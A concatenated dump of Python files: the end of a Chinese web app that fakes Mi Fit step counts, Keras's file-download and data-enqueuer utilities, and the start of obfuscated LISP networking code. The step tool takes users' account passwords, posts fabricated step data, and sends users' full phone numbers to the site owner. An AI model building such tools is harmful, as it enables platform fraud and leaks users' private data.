22%3A3%2C%5C%22dis%5C%22%3A1268%2C%5C%22cal%5C%22%3A59%2C%5C%22step%5C%22%3A1489%7D%2C%7B%5C%22start%5C%22%3A512%2C%5C%22stop%5C%22%3A522%2C%5C%22mode%5C%22%3A1%2C%5C%22dis%5C%22%3A152%2C%5C%22cal%5C%22%3A4%2C%5C%22step%5C%22%3A238%7D%5D%7D%2C%5C%22goal%5C%22%3A8000%2C%5C%22tz%5C%22%3A%5C%2228800%5C%22%7D%22%2C%22source%22%3A24%2C%22type%22%3A0%7D%5D'
# Regexes pulling the current date and total-step ("ttl") values out of
# the URL-encoded data_json payload defined above.
finddate = re.compile(r'.*?date%22%3A%22(.*?)%22%2C%22data.*?')
findstep = re.compile(r'.*?ttl%5C%22%3A(.*?)%2C%5C%22dis.*?')
# NOTE(review): the extracted old date/step value is used as the *pattern*
# argument of re.sub; works because both are digits/dashes, but fragile.
data_json = re.sub(finddate.findall(data_json)[0], today, str(data_json))
data_json = re.sub(findstep.findall(data_json)[0], step, str(data_json))
url = f'https://api-mifit-cn.huami.com/v1/data/band_data.json?&t={t}'
head = {
"apptoken": app_token,
"Content-Type": "application/x-www-form-urlencoded"
}
data = f'userid={userid}&last_sync_data_time=1597306380&device_type=0&last_deviceid=DA932FFFFE8816E7&data_json={data_json}'
response = requests.post(url, data=data, headers=head).json()
# Mask the middle of the phone number in the user-facing result.
result = f"用户:{user[:4]}****{user[-4:]} 修改步数({step}步)" + response['message']
# Notify the site owner; r.incr bumps the daily Redis counter.
# NOTE(review): Push_Token and r are module-level names defined outside
# this view -- confirm they exist before refactoring.
push_pushplus(Push_Token,
f"用户:{phones}刷了{steps}步,这是今天第{r.incr('usercounts')}个刷步数的用户!")
return result
# Fetch a server timestamp
def get_time():
    """Fetch a server-side millisecond timestamp from Taobao's public API."""
    resp = requests.get(
        'http://api.m.taobao.com/rest/api3.do?api=mtop.common.getTimestamp',
        headers=headers,
    ).json()
    return resp['data']['t']
# Fetch the app_token
def get_app_token(login_token):
    """Exchange a login_token for an app_token via the Huami account API."""
    token_url = (
        "https://account-cn.huami.com/v1/client/app_tokens"
        "?app_name=com.xiaomi.hm.health"
        "&dn=api-user.huami.com%2Capi-mifit.huami.com%2Capp-analytics.huami.com"
        f"&login_token={login_token}"
    )
    payload = requests.get(token_url, headers=headers).json()
    app_token = payload['token_info']['app_token']
    print("app_token获取成功!")
    return app_token
# Push a notification via pushplus
def push_pushplus(token, content=""):
"""
Send a one-to-one notification through the pushplus service (legacy API).
Probes the legacy host to decide between the new and old endpoints;
does nothing when `token` is empty.
"""
if token == '':
print("[注意] 未提供token,不进行pushplus推送!")
else:
# Probe the legacy host: a "600" code in the reply means the token has
# migrated to the new endpoint. NOTE(review): this probe actually sends
# a real test message on every call.
if "600" in requests.get(f"http://pushplus.hxtrip.com/send", params={"token": token, "content": "测试"}).text:
server_url = f"http://www.pushplus.plus/send"
else:
server_url = f"http://pushplus.hxtrip.com/send"
params = {
"token": token,
"title": '小米运动【粉丝刷步通知】',
"content": content
}
response = requests.get(server_url, params=params)
# Some responses embed the status in plain text, others in JSON.
if "200" in response.text:
print(f"[{now}] 推送成功。")
else:
json_data = response.json()
if json_data['code'] == 200:
print(f"[{now}] 推送成功。")
else:
print(f"[{now}] 推送失败:{json_data['code']}({json_data['message']})")
# print(f"[{now}] push failed: {response.text}")
# Batch driver: accounts/passwords may be '#'-separated lists, and the
# step field may be a 'lo-hi' range for a per-account random count.
user = str(phones)
passwd = str(psws)
# Steps to modify: enter the desired value directly; leave empty for a
# random count (handled inside main()).
step = str(steps).replace('[', '').replace(']', '')
user_list = user.split('#')
passwd_list = passwd.split('#')
setp_array = step.split('-')
if len(user_list) == len(passwd_list):
push = ''
for line in range(0, len(user_list)):
if len(setp_array) == 2:
# 'lo-hi' range given: roll a fresh random count for each account.
step = str(random.randint(int(setp_array[0]), int(setp_array[1])))
print(f"已设置为随机步数({setp_array[0]}-{setp_array[1]})")
elif str(step) == '0':
# 0 acts as a "use the default" sentinel.
step = '6666'
push += main(user_list[line], passwd_list[line], step) + '\n'
pass
print(push)
toast(push)
else:
print('用户名和密码数量不对,请查看!!!')
def resetcounts():
    """Reset the daily Redis user counter just before midnight, every day."""
    def redisjob():
        # Restore the counter to its seed value.
        r.set('usercounts', 8)
    sched = BlockingScheduler()
    sched.add_job(redisjob, 'cron', month='*', day='*', hour=23, minute=59, second=59)
    sched.start()
if __name__ == '__main__':
# "https://cdn.jsdelivr.net/gh/acloudtwei/CDN/js/mouse.js",
# Run the daily counter reset in a background thread (BlockingScheduler
# would otherwise block the web server).
threads = threading.Thread(target=resetcounts)
threads.start()
# Configure the pywebio page chrome (title/theme/extra JS assets).
weipyweb.config(title="运动刷步数助手(手动版)", description="acloudtwei个人开发网站",
theme="sketchy", js_code='',
js_file=[
"https://cdn.jsdelivr.net/gh/acloudtwei/CDN/js/lines.js",
"https://cdn.jsdelivr.net/gh/acloudtwei/CDN/js/china.js"]
, css_file=[""])
# start_server(mi, port=801, host="0.0.0.0")
# Serve the main flow at / and the help page at /help through tornado.
application = tornado.web.Application([
(r"/", webio_handler(mi)),
(r"/help", webio_handler(xiaomihelp))
])
print("启动ing...")
application.listen(port=80, address='0.0.0.0')
tornado.ioloop.IOLoop.current().start()
|
data_utils.py | """Utilities for file download and caching."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import hashlib
import multiprocessing as mp
import os
import random
import shutil
import sys
import tarfile
import threading
import time
import warnings
import zipfile
from abc import abstractmethod
from contextlib import closing
from multiprocessing.pool import ThreadPool
import numpy as np
import six
from six.moves.urllib.error import HTTPError
from six.moves.urllib.error import URLError
from six.moves.urllib.request import urlopen
try:
import queue
except ImportError:
import Queue as queue
from ..utils.generic_utils import Progbar
if sys.version_info[0] == 2:
def urlretrieve(url, filename, reporthook=None, data=None):
"""Replacement for `urlretrieve` for Python 2.
Under Python 2, `urlretrieve` relies on `FancyURLopener` from legacy
`urllib` module, known to have issues with proxy management.
# Arguments
url: url to retrieve.
filename: where to store the retrieved data locally.
reporthook: a hook function that will be called once
on establishment of the network connection and once
after each block read thereafter.
The hook will be passed three arguments;
a count of blocks transferred so far,
a block size in bytes, and the total size of the file.
data: `data` argument passed to `urlopen`.
"""
def chunk_read(response, chunk_size=8192, reporthook=None):
# NOTE: despite the variable name, this is the Content-Length header
# (total size in bytes), or None when the server does not send it.
content_type = response.info().get('Content-Length')
total_size = -1
if content_type is not None:
total_size = int(content_type.strip())
count = 0
while True:
chunk = response.read(chunk_size)
count += 1
# The hook fires once per read, including the final empty read.
if reporthook is not None:
reporthook(count, chunk_size, total_size)
if chunk:
yield chunk
else:
break
# `closing` guarantees the response is closed even if writing fails.
with closing(urlopen(url, data)) as response, open(filename, 'wb') as fd:
for chunk in chunk_read(response, reporthook=reporthook):
fd.write(chunk)
else:
# Python 3: the stdlib implementation works fine as-is.
from six.moves.urllib.request import urlretrieve
def _extract_archive(file_path, path='.', archive_format='auto'):
    """Extracts an archive if it matches tar, tar.gz, tar.bz, or zip formats.

    # Arguments
        file_path: path to the archive file
        path: path to extract the archive file
        archive_format: Archive format to try for extracting the file.
            Options are 'auto', 'tar', 'zip', and None.
            'tar' includes tar, tar.gz, and tar.bz files.
            The default 'auto' is ['tar', 'zip'].
            None or an empty list will return no matches found.

    # Returns
        True if a match was found and an archive extraction was completed,
        False otherwise.
    """
    if archive_format is None:
        return False
    if archive_format == 'auto':
        archive_format = ['tar', 'zip']
    # A bare string means a single format; stdlib check replaces the old
    # six.string_types test (equivalent for the documented inputs).
    if isinstance(archive_format, str):
        archive_format = [archive_format]

    for archive_type in archive_format:
        if archive_type == 'tar':
            open_fn = tarfile.open
            is_match_fn = tarfile.is_tarfile
        elif archive_type == 'zip':
            open_fn = zipfile.ZipFile
            is_match_fn = zipfile.is_zipfile
        else:
            # Unknown format name: skip it instead of hitting an unbound
            # `is_match_fn` (NameError in the original).
            continue

        if is_match_fn(file_path):
            with open_fn(file_path) as archive:
                try:
                    archive.extractall(path)
                except (tarfile.TarError, zipfile.BadZipfile,
                        RuntimeError, KeyboardInterrupt):
                    # Clean up a partial extraction before re-raising so a
                    # failed attempt does not leave corrupt output behind.
                    # (The original missed zip errors here.)
                    if os.path.exists(path):
                        if os.path.isfile(path):
                            os.remove(path)
                        else:
                            shutil.rmtree(path)
                    raise
            return True
    return False
def get_file(fname,
origin,
untar=False,
md5_hash=None,
file_hash=None,
cache_subdir='datasets',
hash_algorithm='auto',
extract=False,
archive_format='auto',
cache_dir=None):
"""Downloads a file from a URL if it is not already in the cache.
By default the file at the url `origin` is downloaded to the
cache_dir `~/.keras`, placed in the cache_subdir `datasets`,
and given the filename `fname`. The final location of a file
`example.txt` would therefore be `~/.keras/datasets/example.txt`.
Files in tar, tar.gz, tar.bz, and zip formats can also be extracted.
Passing a hash will verify the file after download. The command line
programs `shasum` and `sha256sum` can compute the hash.
# Arguments
fname: Name of the file. If an absolute path `/path/to/file.txt` is
specified the file will be saved at that location.
origin: Original URL of the file.
untar: Deprecated in favor of 'extract'.
boolean, whether the file should be decompressed
md5_hash: Deprecated in favor of 'file_hash'.
md5 hash of the file for verification
file_hash: The expected hash string of the file after download.
The sha256 and md5 hash algorithms are both supported.
cache_subdir: Subdirectory under the Keras cache dir where the file is
saved. If an absolute path `/path/to/folder` is
specified the file will be saved at that location.
hash_algorithm: Select the hash algorithm to verify the file.
options are 'md5', 'sha256', and 'auto'.
The default 'auto' detects the hash algorithm in use.
extract: True tries extracting the file as an Archive, like tar or zip.
archive_format: Archive format to try for extracting the file.
Options are 'auto', 'tar', 'zip', and None.
'tar' includes tar, tar.gz, and tar.bz files.
The default 'auto' is ['tar', 'zip'].
None or an empty list will return no matches found.
cache_dir: Location to store cached files, when None it
defaults to the [Keras Directory](/faq/#where-is-the-keras-configuration-filed-stored).
# Returns
Path to the downloaded file
""" # noqa
if cache_dir is None:
if 'KERAS_HOME' in os.environ:
cache_dir = os.environ.get('KERAS_HOME')
else:
cache_dir = os.path.join(os.path.expanduser('~'), '.keras')
# `md5_hash` is the deprecated spelling of `file_hash`.
if md5_hash is not None and file_hash is None:
file_hash = md5_hash
hash_algorithm = 'md5'
datadir_base = os.path.expanduser(cache_dir)
# Fall back to a world-writable location when the cache dir is read-only.
if not os.access(datadir_base, os.W_OK):
datadir_base = os.path.join('/tmp', '.keras')
datadir = os.path.join(datadir_base, cache_subdir)
if not os.path.exists(datadir):
os.makedirs(datadir)
if untar:
# Legacy layout: the archive itself gets a '.tar.gz' suffix next to
# the extraction target.
untar_fpath = os.path.join(datadir, fname)
fpath = untar_fpath + '.tar.gz'
else:
fpath = os.path.join(datadir, fname)
download = False
if os.path.exists(fpath):
# File found; verify integrity if a hash was provided.
if file_hash is not None:
if not validate_file(fpath, file_hash, algorithm=hash_algorithm):
print('A local file was found, but it seems to be '
'incomplete or outdated because the ' + hash_algorithm +
' file hash does not match the original value of ' +
file_hash + ' so we will re-download the data.')
download = True
else:
download = True
if download:
print('Downloading data from', origin)
class ProgressTracker(object):
# Maintain progbar for the lifetime of download.
# This design was chosen for Python 2.7 compatibility.
progbar = None
def dl_progress(count, block_size, total_size):
if ProgressTracker.progbar is None:
# -1 means the server sent no Content-Length.
if total_size == -1:
total_size = None
ProgressTracker.progbar = Progbar(total_size)
else:
ProgressTracker.progbar.update(count * block_size)
error_msg = 'URL fetch failure on {} : {} -- {}'
try:
try:
urlretrieve(origin, fpath, dl_progress)
except HTTPError as e:
raise Exception(error_msg.format(origin, e.code, e.msg))
except URLError as e:
raise Exception(error_msg.format(origin, e.errno, e.reason))
except (Exception, KeyboardInterrupt):
# Remove a partially-downloaded file so a later call retries cleanly.
if os.path.exists(fpath):
os.remove(fpath)
raise
ProgressTracker.progbar = None
if untar:
# Deprecated path: extract once, return the extracted location
# rather than the .tar.gz itself.
if not os.path.exists(untar_fpath):
_extract_archive(fpath, datadir, archive_format='tar')
return untar_fpath
if extract:
_extract_archive(fpath, datadir, archive_format)
return fpath
def _hash_file(fpath, algorithm='sha256', chunk_size=65535):
    """Calculates a file sha256 or md5 hash.

    # Example
    ```python
    >>> from keras.data_utils import _hash_file
    >>> _hash_file('/path/to/file.zip')
    'e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855'
    ```

    # Arguments
        fpath: path to the file being validated
        algorithm: hash algorithm, one of 'auto', 'sha256', or 'md5'.
            'auto' behaves like 'sha256': with no expected hash available
            here, there is nothing to sniff the algorithm from.
        chunk_size: Bytes to read at a time, important for large files.

    # Returns
        The file hash
    """
    # The original tested `len(hash) == 64`, accidentally referencing the
    # *builtin* `hash` function and raising TypeError for algorithm='auto'.
    if algorithm in ('sha256', 'auto'):
        hasher = hashlib.sha256()
    else:
        hasher = hashlib.md5()
    # Read in fixed-size chunks so huge files never sit in memory at once.
    with open(fpath, 'rb') as fpath_file:
        for chunk in iter(lambda: fpath_file.read(chunk_size), b''):
            hasher.update(chunk)
    return hasher.hexdigest()
def validate_file(fpath, file_hash, algorithm='auto', chunk_size=65535):
    """Validates a file against a sha256 or md5 hash.

    # Arguments
        fpath: path to the file being validated
        file_hash: The expected hash string of the file.
            The sha256 and md5 hash algorithms are both supported.
        algorithm: Hash algorithm, one of 'auto', 'sha256', or 'md5'.
            The default 'auto' detects the hash algorithm in use
            (a 64-character hex digest is assumed to be sha256).
        chunk_size: Bytes to read at a time, important for large files.

    # Returns
        Whether the file is valid
    """
    if ((algorithm == 'sha256') or
            (algorithm == 'auto' and len(file_hash) == 64)):
        hasher = 'sha256'
    else:
        hasher = 'md5'
    # Compare via str() so callers passing non-str digests still work;
    # returning the comparison directly replaces the if/True/else/False.
    return str(_hash_file(fpath, hasher, chunk_size)) == str(file_hash)
class Sequence(object):
    """Base object for fitting to a sequence of data, such as a dataset.

    Subclasses must implement `__getitem__` (returning one complete batch)
    and `__len__` (the number of batches per epoch). `on_epoch_end` may be
    overridden to modify the dataset between epochs.

    # Notes
    `Sequence` are a safer way to do multiprocessing than generators: the
    structure guarantees the network trains exactly once on each sample per
    epoch.

    # Examples
    ```python
    from skimage.io import imread
    from skimage.transform import resize
    import numpy as np

    # Here, `x_set` is list of path to the images
    # and `y_set` are the associated classes.

    class CIFAR10Sequence(Sequence):

        def __init__(self, x_set, y_set, batch_size):
            self.x, self.y = x_set, y_set
            self.batch_size = batch_size

        def __len__(self):
            return int(np.ceil(len(self.x) / float(self.batch_size)))

        def __getitem__(self, idx):
            batch_x = self.x[idx * self.batch_size:(idx + 1) * self.batch_size]
            batch_y = self.y[idx * self.batch_size:(idx + 1) * self.batch_size]

            return np.array([
                resize(imread(file_name), (200, 200))
                for file_name in batch_x]), np.array(batch_y)
    ```
    """
    # Flag used elsewhere to tell Sequence objects apart from generators.
    use_sequence_api = True

    @abstractmethod
    def __getitem__(self, index):
        """Gets batch at position `index`.

        # Arguments
            index: position of the batch in the Sequence.

        # Returns
            A batch
        """
        raise NotImplementedError

    @abstractmethod
    def __len__(self):
        """Number of batch in the Sequence.

        # Returns
            The number of batches in the Sequence.
        """
        raise NotImplementedError

    def on_epoch_end(self):
        """Hook called once at the end of every epoch; no-op by default."""
        pass

    def __iter__(self):
        """Yield every batch of the Sequence in index order."""
        for index in range(len(self)):
            yield self[index]
# Global variables to be shared across processes: maps an enqueuer uid to
# its Sequence/generator so worker processes (after init_pool) can look
# items up by uid.
_SHARED_SEQUENCES = {}
# We use a Value to provide unique id to different processes.  Stays None
# until the first enqueuer is constructed; falls back to a plain int when
# multiprocessing.Value is unavailable on this OS.
_SEQUENCE_COUNTER = None
def init_pool(seqs):
    """Worker-pool initializer: install `seqs` as the shared sequence table."""
    global _SHARED_SEQUENCES
    _SHARED_SEQUENCES = seqs
def get_index(uid, i):
    """Get the value from the Sequence `uid` at index `i`.

    To allow multiple Sequences to be used at the same time, we use `uid`
    to pick a specific one out of the shared table. A single Sequence
    would cause the validation to overwrite the training Sequence.

    # Arguments
        uid: int, Sequence identifier
        i: index

    # Returns
        The value at index `i`.
    """
    shared_sequence = _SHARED_SEQUENCES[uid]
    return shared_sequence[i]
class SequenceEnqueuer(object):
    """Base class to enqueue inputs.

    The task of an Enqueuer is to use parallelism to speed up preprocessing.
    This is done with processes or threads.

    # Examples

    ```python
        enqueuer = SequenceEnqueuer(...)
        enqueuer.start()
        datas = enqueuer.get()
        for data in datas:
            # Use the inputs; training, evaluating, predicting.
            # ... stop sometime.
        enqueuer.close()
    ```

    The `enqueuer.get()` should be an infinite stream of datas.
    """

    def __init__(self, sequence,
                 use_multiprocessing=False):
        # The Sequence (or generator) that workers will pull items from.
        self.sequence = sequence
        # True -> process pool, False -> thread pool (decided in start()).
        self.use_multiprocessing = use_multiprocessing

        # Allocate a uid unique across enqueuers (and, when possible,
        # across processes) so several enqueuers can share
        # _SHARED_SEQUENCES concurrently.
        global _SEQUENCE_COUNTER
        if _SEQUENCE_COUNTER is None:
            try:
                _SEQUENCE_COUNTER = mp.Value('i', 0)
            except OSError:
                # In this case the OS does not allow us to use
                # multiprocessing. We resort to an int
                # for enqueuer indexing.
                _SEQUENCE_COUNTER = 0

        if isinstance(_SEQUENCE_COUNTER, int):
            # Plain-int fallback path (no multiprocessing available).
            self.uid = _SEQUENCE_COUNTER
            _SEQUENCE_COUNTER += 1
        else:
            # Doing Multiprocessing.Value += x is not process-safe.
            with _SEQUENCE_COUNTER.get_lock():
                self.uid = _SEQUENCE_COUNTER.value
                _SEQUENCE_COUNTER.value += 1

        # Populated by start(); reset/None while the enqueuer is idle.
        self.workers = 0
        self.executor_fn = None
        self.queue = None
        self.run_thread = None
        self.stop_signal = None

    def is_running(self):
        # Running means start() has been called and stop() has not yet
        # signalled shutdown.
        return self.stop_signal is not None and not self.stop_signal.is_set()

    def start(self, workers=1, max_queue_size=10):
        """Start the handler's workers.

        # Arguments
            workers: number of worker threads
            max_queue_size: queue size
                (when full, workers could block on `put()`)
        """
        if self.use_multiprocessing:
            self.executor_fn = self._get_executor_init(workers)
        else:
            # We do not need the init since it's threads.
            self.executor_fn = lambda _: ThreadPool(workers)
        self.workers = workers
        self.queue = queue.Queue(max_queue_size)
        self.stop_signal = threading.Event()
        # Daemon thread so a hung producer never blocks interpreter exit.
        self.run_thread = threading.Thread(target=self._run)
        self.run_thread.daemon = True
        self.run_thread.start()

    def _send_sequence(self):
        """Send current Iterable to all workers."""
        # For new processes that may spawn
        _SHARED_SEQUENCES[self.uid] = self.sequence

    def stop(self, timeout=None):
        """Stops running threads and wait for them to exit, if necessary.

        Should be called by the same thread which called `start()`.

        # Arguments
            timeout: maximum time to wait on `thread.join()`
        """
        self.stop_signal.set()
        # Drain the queue under its own mutex so blocked producers wake up.
        with self.queue.mutex:
            self.queue.queue.clear()
            self.queue.unfinished_tasks = 0
            self.queue.not_full.notify()
        self.run_thread.join(timeout)
        # Release the shared reference so the Sequence can be collected.
        _SHARED_SEQUENCES[self.uid] = None

    @abstractmethod
    def _run(self):
        """Submits request to the executor and queue the `Future` objects."""
        raise NotImplementedError

    @abstractmethod
    def _get_executor_init(self, workers):
        """Get the Pool initializer for multiprocessing.

        # Returns
            Function, a Function to initialize the pool
        """
        raise NotImplementedError

    @abstractmethod
    def get(self):
        """Creates a generator to extract data from the queue.

        Skip the data if it is `None`.

        # Returns
            Generator yielding tuples `(inputs, targets)`
                or `(inputs, targets, sample_weights)`.
        """
        raise NotImplementedError
class OrderedEnqueuer(SequenceEnqueuer):
    """Builds a Enqueuer from a Sequence.

    Used in `fit_generator`, `evaluate_generator`, `predict_generator`.

    # Arguments
        sequence: A `keras.utils.data_utils.Sequence` object.
        use_multiprocessing: use multiprocessing if True, otherwise threading
        shuffle: whether to shuffle the data at the beginning of each epoch
    """

    def __init__(self, sequence, use_multiprocessing=False, shuffle=False):
        super(OrderedEnqueuer, self).__init__(sequence, use_multiprocessing)
        self.shuffle = shuffle

    def _get_executor_init(self, workers):
        """Get the Pool initializer for multiprocessing.

        # Returns
            Function, a Function to initialize the pool
        """
        # init_pool publishes _SHARED_SEQUENCES into each worker process.
        return lambda seqs: mp.Pool(workers,
                                    initializer=init_pool,
                                    initargs=(seqs,))

    def _wait_queue(self):
        """Wait for the queue to be empty."""
        # Polls every 100 ms; also returns early on shutdown.
        while True:
            time.sleep(0.1)
            if self.queue.unfinished_tasks == 0 or self.stop_signal.is_set():
                return

    def _run(self):
        """Submits request to the executor and queue the `Future` objects."""
        # Indices are submitted in order, so results come out in order too.
        sequence = list(range(len(self.sequence)))
        self._send_sequence()  # Share the initial sequence
        while True:
            if self.shuffle:
                random.shuffle(sequence)

            with closing(self.executor_fn(_SHARED_SEQUENCES)) as executor:
                for i in sequence:
                    if self.stop_signal.is_set():
                        return
                    future = executor.apply_async(get_index, (self.uid, i))
                    # Remember the index so get() can recompute the batch
                    # locally if this future times out.
                    future.idx = i
                    self.queue.put(future, block=True)

                # Done with the current epoch, waiting for the final batches
                self._wait_queue()

                if self.stop_signal.is_set():
                    # We're done
                    return

            # Call the internal on epoch end.
            self.sequence.on_epoch_end()
            self._send_sequence()  # Update the pool

    def get(self):
        """Creates a generator to extract data from the queue.

        Skip the data if it is `None`.

        # Yields
            The next element in the queue, i.e. a tuple
                `(inputs, targets)` or
                `(inputs, targets, sample_weights)`.
        """
        try:
            while self.is_running():
                try:
                    future = self.queue.get(block=True)
                    inputs = future.get(timeout=30)
                    self.queue.task_done()
                except mp.TimeoutError:
                    # A worker may have died; fall back to computing the
                    # batch in this thread using the index stashed above.
                    idx = future.idx
                    warnings.warn(
                        'The input {} could not be retrieved.'
                        ' It could be because a worker has died.'.format(idx),
                        UserWarning)
                    inputs = self.sequence[idx]
                if inputs is not None:
                    yield inputs
        except Exception:
            # Stop the producer thread before propagating to the caller.
            self.stop()
            six.reraise(*sys.exc_info())
def init_pool_generator(gens, random_seed=None):
    """Worker-pool initializer for generator enqueuers.

    Installs `gens` as the shared table and, when `random_seed` is given,
    seeds NumPy differently in each worker (seed + process ident).
    """
    global _SHARED_SEQUENCES
    _SHARED_SEQUENCES = gens
    if random_seed is None:
        return
    worker_ident = mp.current_process().ident
    np.random.seed(random_seed + worker_ident)
def next_sample(uid):
    """Get the next value from the generator `uid`.

    To allow multiple generators to be used at the same time, we use
    `uid` to pick a specific one out of the shared table. A single
    generator would cause the validation to overwrite the training
    generator.

    # Arguments
        uid: int, generator identifier

    # Returns
        The next value of generator `uid`.
    """
    shared_generator = _SHARED_SEQUENCES[uid]
    return six.next(shared_generator)
class GeneratorEnqueuer(SequenceEnqueuer):
    """Builds a queue out of a data generator.

    The provided generator can be finite in which case the class will throw
    a `StopIteration` exception.

    Used in `fit_generator`, `evaluate_generator`, `predict_generator`.

    # Arguments
        generator: a generator function which yields data
        use_multiprocessing: use multiprocessing if True, otherwise threading
        wait_time: time to sleep in-between calls to `put()` (deprecated)
        random_seed: Initial seed for workers,
            will be incremented by one for each worker.
    """

    def __init__(self, sequence, use_multiprocessing=False, wait_time=None,
                 random_seed=None):
        super(GeneratorEnqueuer, self).__init__(sequence, use_multiprocessing)
        self.random_seed = random_seed
        if wait_time is not None:
            # Parameter kept only for backward compatibility of the signature.
            warnings.warn('`wait_time` is not used anymore.',
                          DeprecationWarning)

    def _get_executor_init(self, workers):
        """Get the Pool initializer for multiprocessing.

        # Returns
            Function, a Function to initialize the pool
        """
        # init_pool_generator also seeds NumPy per worker when a seed is set.
        return lambda seqs: mp.Pool(workers,
                                    initializer=init_pool_generator,
                                    initargs=(seqs, self.random_seed))

    def _run(self):
        """Submits request to the executor and queue the `Future` objects."""
        self._send_sequence()  # Share the initial generator
        with closing(self.executor_fn(_SHARED_SEQUENCES)) as executor:
            while True:
                if self.stop_signal.is_set():
                    return
                # Generators have no index; workers just pull the next item.
                self.queue.put(
                    executor.apply_async(next_sample, (self.uid,)), block=True)

    def get(self):
        """Creates a generator to extract data from the queue.

        Skip the data if it is `None`.

        # Yields
            The next element in the queue, i.e. a tuple
                `(inputs, targets)` or
                `(inputs, targets, sample_weights)`.
        """
        try:
            while self.is_running():
                try:
                    future = self.queue.get(block=True)
                    inputs = future.get(timeout=30)
                    self.queue.task_done()
                except mp.TimeoutError:
                    # Unlike OrderedEnqueuer there is no index to recompute
                    # from, so the sample is simply lost.
                    warnings.warn(
                        'An input could not be retrieved.'
                        ' It could be because a worker has died.'
                        'We do not have any information on the lost sample.',
                        UserWarning)
                    continue
                if inputs is not None:
                    yield inputs
        except StopIteration:
            # Special case for finite generators
            last_ones = []
            while self.queue.qsize() > 0:
                last_ones.append(self.queue.get(block=True))
            # Wait for them to complete
            list(map(lambda f: f.wait(), last_ones))
            # Keep the good ones
            last_ones = [future.get() for future in last_ones if future.successful()]
            for inputs in last_ones:
                if inputs is not None:
                    yield inputs
        except Exception as e:
            self.stop()
            # A plain generator shared across threads raises this message
            # when two threads advance it at once.
            if 'generator already executing' in str(e):
                raise RuntimeError(
                    "Your generator is NOT thread-safe."
                    "Keras requires a thread-safe generator when"
                    "`use_multiprocessing=False, workers > 1`."
                    "For more information see issue #1638.")
            six.reraise(*sys.exc_info())
|
lisp-core.py | # -----------------------------------------------------------------------------
#
# Copyright 2013-2019 lispers.net - Dino Farinacci <farinacci@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -----------------------------------------------------------------------------
#
# lisp-core.py
#
# This is the core process that is used to demux to the specific LISP
# functional components. The 4342 listen socket is centralized here.
#
#
# +------------- data encapsulation via network --------------+
# | |
# | IPC when mr & ms colocated |
# | +--------------------------------+ |
# | | | |
# | | IPC when mr & ddt colo | |
# | | +------------+ | |
# | | | | | |
# | | | v v v 4341
# +-------------+ +----------+ +----------+ +----------+ +----------+
# | lisp-[ir]tr | | lisp-mr | | lisp-ddt | | lisp-ms | | lisp-etr |
# +-------------+ +----------+ +----------+ +----------+ +----------+
# ^ IPC ^ IPC ^ IPC ^ IPC ^ IPC
# | | | | |
# | | | | |
# | | | | |
# +--------------+--------------+--------------+--------------+
# |
# | for dispatching control messages
# +-----------+
# | lisp-core |
# +-----------+
# | 4342
# |
# via network
#
# -----------------------------------------------------------------------------
if 64 - 64: i11iIiiIii
import lisp
import lispconfig
import multiprocessing
import threading
import commands
import time
import os
import bottle
from cherrypy import wsgiserver
from cherrypy . wsgiserver . ssl_pyopenssl import pyOpenSSLAdapter
if 65 - 65: O0 / iIii1I11I1II1 % OoooooooOO - i1IIi
import json
import sys
import socket
import thread
if 73 - 73: II111iiii
if 22 - 22: I1IiiI * Oo0Ooo / OoO0O00 . OoOoOO00 . o0oOOo0O0Ooo / I1ii11iIi11i
if 48 - 48: oO0o / OOooOOo / I11i / Ii1I
if 48 - 48: iII111i % IiII + I1Ii111 / ooOoO0o * Ii1I
if 46 - 46: ooOoO0o * I11i - OoooooooOO
if 30 - 30: o0oOOo0O0Ooo - O0 % o0oOOo0O0Ooo - OoooooooOO * O0 * OoooooooOO
# Module-level state shared by the route handlers below.  Identifiers are
# obfuscated in this distribution; comments record observed usage only.
Oo0o = ""
if 60 - 60: I1ii11iIi11i + I1Ii111 - I11i / i1IIi  # obfuscator no-op padding
Ii1iI = None
# NOTE(review): `Oo` is later passed to lisp.lisp_ipc()/lisp_receive() and
# lispconfig.lisp_process_show_command() -- presumably the IPC socket; confirm.
Oo = None
I1Ii11I1Ii1i = None
Ooo = [None, None, None]
o0oOoO00o = None
if 43 - 43: Ii1I . oO0o
if 27 - 27: OoO0O00 - O0 . I1Ii111 * iII111i - I1ii11iIi11i
if 15 - 15: I1IiiI
if 90 - 90: IiII * i1IIi / Ii1I . OoO0O00 * oO0o
if 16 - 16: ooOoO0o * IiII % I11i . I1Ii111 / IiII % iII111i
if 27 - 27: IiII . i1IIi * OoOoOO00 % Ii1I / i1IIi
if 3 - 3: IiII / ooOoO0o
if 28 - 28: ooOoO0o + I1Ii111 - ooOoO0o . OoooooooOO
@bottle.route('/lisp/api', method="get")
@bottle.route('/lisp/api/<command>', method="get")
@bottle.route('/lisp/api/<command>/<data_structure>', method="get")
def oO0(command="", data_structure=""):
    """REST GET handler for /lisp/api.

    Authenticates the caller (HTTP basic auth, or login cookie for
    browsers), then either returns a LISP data-structure dump (when
    `command` == "data") or the configuration clause named by `command`
    as JSON.  Python 2 code: dict.keys()/values() are lists here.
    """
    # Default error payload returned on any authentication failure.
    IIIi1i1I = [{"?": [{"?": "not-auth"}]}]
    if 72 - 72: Oo0Ooo % OOooOOo . I1IiiI / I11i * I1IiiI
    if 31 - 31: II111iiii + OoO0O00 . I1Ii111
    if 68 - 68: I1IiiI - i11iIiiIii - OoO0O00 / OOooOOo - OoO0O00 + i1IIi
    if 48 - 48: OoooooooOO % o0oOOo0O0Ooo . I1IiiI - Ii1I % i1IIi % OoooooooOO
    if (bottle.request.auth != None):
        # Basic-auth credentials supplied; check the user database.
        i1iIIi1, ii11iIi1I = bottle.request.auth
        if (lispconfig.lisp_find_user_account(i1iIIi1, ii11iIi1I) == False):
            return (json.dumps(IIIi1i1I))
        if 6 - 6: OoOoOO00 * iII111i
    else:
        # No basic auth: reject scripted (python) clients, otherwise fall
        # back to the browser login-cookie check.
        if (bottle.request.headers["User-Agent"].find("python") != -1):
            return (json.dumps(IIIi1i1I))
        if 67 - 67: ooOoO0o - oO0o * o0oOOo0O0Ooo % o0oOOo0O0Ooo % I11i * OoOoOO00
        if (lispconfig.lisp_validate_user() == False):
